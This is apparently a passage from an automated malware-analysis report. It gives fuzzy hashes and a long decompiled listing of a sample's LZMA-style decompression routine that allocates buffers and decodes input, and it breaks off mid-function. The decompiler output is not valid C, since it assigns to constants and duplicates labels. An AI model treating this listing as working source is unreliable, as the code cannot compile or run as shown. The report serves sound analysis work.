                                                                                                                          • Opcode Fuzzy Hash: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                                                                                                          • Instruction Fuzzy Hash: A3818731E00228CFDF24DFA8C8447ADBBB1FB45305F21816AD956BB281C7785A96DF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406473, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00406473() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
